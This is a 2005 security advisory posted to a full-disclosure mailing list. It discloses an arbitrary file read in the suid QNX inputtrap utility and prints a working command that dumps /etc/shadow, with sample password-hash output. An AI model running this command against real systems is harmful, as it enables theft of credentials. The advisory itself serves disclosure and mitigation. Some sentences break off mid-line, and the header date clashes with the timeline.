[Full-disclosure] [RLSA_01-2005] QNX inputtrap arbitrary file read vulnerability
From: Julio Cesar Fort (juliorfdslabs.com.br)
Date: Wed Aug 24 2005 - 09:36:38 CDT
*** rfdslabs security advisory ***
Title: QNX inputtrap arbitrary file read vulnerability [RLSA_01-2005]
Versions: QNX RTOS 6.3, 6.1.0 (possibly others)
Date: Feb 22 2004
Author: Julio Cesar Fort <julio *NO_SPAM* rfdslabs com br>
inputtrap is a utility designed to detect and start the input manager in QNX.
inputtrap has a '-t' flag to specify the trap file to be read. Because
permissions are not checked properly, using this flag together with 'start'
gives us administrative access to read files on the disk.
The following simple command will show us /etc/shadow:
$ inputtrap -t /etc/shadow start
options: Unable to lookup root:21QjUKxP9gEJK:0:0:0 in modules table
options: Unable to lookup sandimas:91UzHxvt3x1n2:0:0:0 in modules table
PS: This "design error" problem is similar to an old Debian 1.1 DOSEmu
vulnerability, back in 1999. And it was, surely, eradicated in crucial
of most operating systems.
No official solution yet. We suggest removing the inputtrap suid bit or
permissions to a trusted group of users until QNX doesn't release an
22 Feb 2005: Vulnerability detected (in a very very boring day, ill at
09 Jun 2005: Advisory sent to QNX;
10 Jun 2005: QNX contacted rfdslabs;
24 Aug 2005: Advisory sent to security mailing lists.
Thanks to Lucien Rocha, Carlos Barros (barrossecurity.com), George Fleury,
Rodrigo Costa (NERV), Despise, gotfault.org and everyone at rfdslabs.
www.rfdslabs.com.br - computers, sex, human mind, music and more
Recife, PE, Brazil